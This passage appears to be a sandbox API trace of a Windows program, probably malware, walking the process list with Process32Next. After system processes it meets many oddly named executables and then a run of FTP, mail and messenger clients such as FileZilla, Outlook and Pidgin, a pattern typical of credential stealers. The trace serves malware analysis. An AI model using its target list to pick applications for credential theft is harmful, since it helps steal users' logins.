[0129.454] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.454] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.454] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.455] GetTickCount () returned 0x116f4b0 [0129.455] GetCurrentThreadId () returned 0x618 [0129.455] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.455] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.455] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.457] GetTickCount () returned 0x116f4b0 [0129.457] GetCurrentThreadId () returned 0x618 [0129.457] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.457] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.457] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.458] GetTickCount () returned 0x116f4b0 [0129.458] GetCurrentThreadId () returned 0x618 [0129.458] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.458] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.458] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.459] GetTickCount () returned 0x116f4b0 [0129.459] GetCurrentThreadId () returned 0x618 [0129.459] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.459] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.459] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.460] GetTickCount () returned 0x116f4b0 [0129.460] GetCurrentThreadId () returned 0x618 [0129.460] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.460] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.460] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.461] GetTickCount () returned 0x116f4b0 [0129.461] GetCurrentThreadId () returned 0x618 [0129.462] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.462] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.462] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.463] GetTickCount () returned 0x116f4b0 [0129.463] GetCurrentThreadId () returned 0x618 [0129.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.463] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="herb cos completed.exe")) returned 1 [0129.464] GetTickCount () returned 0x116f4b0 [0129.464] GetCurrentThreadId () returned 0x618 [0129.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.464] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x71c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dealers.exe")) returned 1 [0129.465] GetTickCount () returned 0x116f4b0 [0129.465] GetCurrentThreadId () returned 0x618 [0129.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.465] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hall-stronger.exe")) returned 1 [0129.466] GetTickCount () returned 0x116f4b0 [0129.466] GetCurrentThreadId () returned 0x618 [0129.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.467] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rp-hip.exe")) returned 1 [0129.468] GetTickCount () returned 0x116f4b0 [0129.468] GetCurrentThreadId () returned 0x618 [0129.468] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.468] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="karma_coat.exe")) returned 1 [0129.469] GetTickCount () returned 0x116f4b0 [0129.469] GetCurrentThreadId () returned 0x618 [0129.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.469] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="plenty_leather.exe")) returned 1 [0129.470] GetTickCount () returned 0x116f4bf [0129.470] GetCurrentThreadId () returned 0x618 [0129.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.470] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrytrackbackspatent.exe")) returned 1 [0129.472] GetTickCount () returned 0x116f4bf [0129.472] GetCurrentThreadId () returned 0x618 [0129.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.472] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="busy.exe")) returned 1 [0129.473] GetTickCount () returned 0x116f4bf [0129.473] GetCurrentThreadId () returned 0x618 [0129.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.473] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sudan_territory.exe")) returned 1 [0129.474] GetTickCount () returned 0x116f4bf [0129.474] GetCurrentThreadId () returned 0x618 [0129.474] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.474] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="catalogs intelligent.exe")) returned 1 [0129.475] GetTickCount () returned 0x116f4bf [0129.475] GetCurrentThreadId () returned 0x618 [0129.475] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.475] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.475] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="prisonermounted.exe")) returned 1 [0129.477] GetTickCount () returned 0x116f4bf [0129.477] GetCurrentThreadId () returned 0x618 [0129.477] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.477] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.477] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extensive.exe")) returned 1 [0129.478] GetTickCount () returned 0x116f4bf [0129.478] GetCurrentThreadId () returned 0x618 [0129.478] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.478] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.478] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="posters-baker-lift.exe")) returned 1 [0129.479] GetTickCount () returned 0x116f4bf [0129.479] GetCurrentThreadId () returned 0x618 [0129.479] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.479] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.479] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="emperor_respected.exe")) returned 1 [0129.481] GetTickCount () returned 0x116f4bf [0129.481] GetCurrentThreadId () returned 0x618 [0129.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.481] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.481] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="illinois indicated regional.exe")) returned 1 [0129.482] GetTickCount () returned 0x116f4bf [0129.482] GetCurrentThreadId () returned 0x618 [0129.482] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.482] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.482] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="apartmentscontemporary.exe")) returned 1 [0129.483] GetTickCount () returned 0x116f4bf [0129.483] GetCurrentThreadId () returned 0x618 [0129.483] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.483] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.484] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="witch-feat.exe")) returned 1 [0129.485] GetTickCount () returned 0x116f4bf [0129.485] GetCurrentThreadId () returned 0x618 [0129.485] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.485] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.485] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0129.486] GetTickCount () returned 0x116f4cf [0129.486] GetCurrentThreadId () returned 0x618 [0129.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.486] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0129.487] GetTickCount () returned 0x116f4cf [0129.487] GetCurrentThreadId () returned 0x618 [0129.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.487] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0129.489] GetTickCount () returned 0x116f4cf [0129.489] GetCurrentThreadId () returned 0x618 [0129.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.489] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0129.490] GetTickCount () returned 0x116f4cf [0129.490] GetCurrentThreadId () returned 0x618 [0129.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.490] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0129.491] GetTickCount () returned 0x116f4cf [0129.491] GetCurrentThreadId () returned 0x618 [0129.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.491] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0129.492] GetTickCount () returned 0x116f4cf [0129.492] GetCurrentThreadId () returned 0x618 [0129.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.493] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0129.494] GetTickCount () returned 0x116f4cf [0129.494] GetCurrentThreadId () returned 0x618 [0129.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.494] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0129.495] GetTickCount () returned 0x116f4cf [0129.495] GetCurrentThreadId () returned 0x618 [0129.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.495] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.495] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0129.496] GetTickCount () returned 0x116f4cf [0129.496] GetCurrentThreadId () returned 0x618 [0129.496] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.496] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.496] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0129.497] GetTickCount () returned 0x116f4cf [0129.498] GetCurrentThreadId () returned 0x618 [0129.498] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.498] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.498] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0129.499] GetTickCount () returned 0x116f4cf [0129.499] GetCurrentThreadId () returned 0x618 [0129.499] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.499] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.499] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0129.500] GetTickCount () returned 0x116f4cf [0129.500] GetCurrentThreadId () returned 0x618 [0129.500] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.500] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.500] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0129.501] GetTickCount () returned 0x116f4df [0129.501] GetCurrentThreadId () returned 0x618 [0129.501] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.501] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.501] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0129.503] GetTickCount () returned 0x116f4df [0129.503] GetCurrentThreadId () returned 0x618 [0129.503] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.503] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.503] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0129.505] GetTickCount () returned 0x116f4df [0129.505] GetCurrentThreadId () returned 0x618 [0129.505] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.505] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.505] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0129.506] GetTickCount () returned 0x116f4df [0129.506] GetCurrentThreadId () returned 0x618 [0129.506] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.506] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.506] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0129.507] GetTickCount () returned 0x116f4df [0129.507] GetCurrentThreadId () returned 0x618 [0129.507] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.507] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.507] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0129.508] GetTickCount () returned 0x116f4df [0129.508] GetCurrentThreadId () returned 0x618 [0129.508] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.508] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.508] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0129.509] GetTickCount () returned 0x116f4df [0129.510] GetCurrentThreadId () returned 0x618 [0129.510] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, 